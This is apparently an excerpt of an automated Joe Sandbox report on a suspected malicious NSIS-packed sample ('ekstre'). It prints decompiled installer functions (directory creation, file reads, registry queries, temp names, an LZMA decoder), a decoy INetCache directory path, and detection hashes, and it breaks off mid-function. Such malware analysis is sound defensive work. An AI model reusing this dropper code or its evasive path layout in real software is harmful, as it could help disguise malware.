Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp
API String ID: 2655323295-3593843845
Opcode ID: 84ab27198bf589845e26b58e726a2bbf01ed2fb670428c334cb0b66011b931f9
Instruction ID: 522267cc353e07343dd801e2092b634aa3a47a5894277993a9ab26856076dc84
Opcode Fuzzy Hash: 84ab27198bf589845e26b58e726a2bbf01ed2fb670428c334cb0b66011b931f9
Instruction Fuzzy Hash: EE117C71E00118BEEF10AFA5DE8DEAEBAB8BB44354F11443AF504F61D1DAB98D409A58

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNELBASE(?,?,004D5000), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4702b8;
					 *0x4326f4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x4326f4 =  *0x4326f4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x4326f4 =  *0x4326f4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x4266f0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x4266f0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x4326f4 =  *0x4326f4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Strings

<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83, xrefs: 004033EB, 00403402, 00403418

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FilePointer
String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83
API String ID: 973152223-2121849026
Opcode ID: bb1e4cebc5dcbbcc8da6da60d5f6c2def6aeab654d6aef171c0c34421c327544
Instruction ID: 5b87ae666d03a85e0880c8fa6797b588b85de508064ca19fb956cb10fba5bdd7
Opcode Fuzzy Hash: bb1e4cebc5dcbbcc8da6da60d5f6c2def6aeab654d6aef171c0c34421c327544
Instruction Fuzzy Hash: CA317F70100219FFDB129F65ED85E9A3F68EF04355F10403AF905EA1A1D778DA50DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed\\Buntmagersyers\\Mamelonation",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,0045A750,?,00406056,0045A750,0045A750,75D53420,?,75D52EE0,00405D94,?,75D53420,75D52EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,004D5000), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation
API String ID: 1892508949-4273613624
Opcode ID: cc44533212ce9da46de3b55e465810cdea7c2b394772574d2fb854b0d56e1529
Instruction ID: 706983d786853b9d3ab493fb34c22f4ae4f93c191eda055ecbeadfe80866d735
Opcode Fuzzy Hash: cc44533212ce9da46de3b55e465810cdea7c2b394772574d2fb854b0d56e1529
Instruction Fuzzy Hash: 42112231408104EBCF206FA1CD44A9E36A0EF15329B28093FF505B22F1DB3E4981DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x4000;
				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x3ffe] = _t30[0x3ffe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00004000,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00406587

Strings

Call, xrefs: 0040653D

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
Instruction ID: 1fbcc26cc6b857459d5a583c8ac9bd3aa1479396c6e4517460947190b04d1158
Opcode Fuzzy Hash: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
Instruction Fuzzy Hash: C8017C72500209FADF22CF51DD09EDB3BA8EF54364F01403AFD16A2190D738DA64DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
